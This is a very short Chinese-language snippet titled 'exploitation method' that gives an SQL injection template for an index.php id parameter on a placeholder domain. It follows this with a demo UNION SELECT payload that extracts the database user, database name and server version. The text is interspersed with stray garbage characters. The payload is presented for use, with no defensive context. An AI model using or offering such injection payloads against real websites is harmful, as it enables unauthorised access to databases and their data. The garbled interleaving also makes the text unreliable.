利用方法:
: L& z1 B/ Z. D http://www.xxx.com/index.php?id=[SQL]
8 k: {7 ]% j# {" s: H+ z x6 Z Demo:, j8 E& ?, R* d1 C; r' h
http://www.xxx.com/index.php?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+ |